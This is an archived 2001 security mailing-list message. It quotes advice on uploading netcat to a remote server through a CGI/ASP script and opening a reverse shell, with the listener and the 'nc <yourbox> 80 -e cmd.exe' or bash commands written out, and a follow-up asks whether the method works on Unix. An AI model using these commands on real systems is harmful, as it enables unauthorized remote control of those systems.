On Fri, 21 Sep 2001, Bill Pennington wrote: > You want netcat, you can find in on packetstorm. > > What you will need to do first is build an CGI/ASP script to upload your > code, assuming you can't just tftp it from the internal system. > > Then on your box execute: > > nc -l -p 80 > > On the remote server execute > > nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or > whatever command interpeter is handy. You will then see a command prompt > appear on your local box. > > Sounds like the hard part will be getting netcat on the box. Good luck! > Does this works on unix machines? I have compiled netcat with -DGAPING_SECURITY_HOLE (so i could use the -e switch) but had no luck. itb ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Sat Sep 22 2001 - 05:42:45 PDT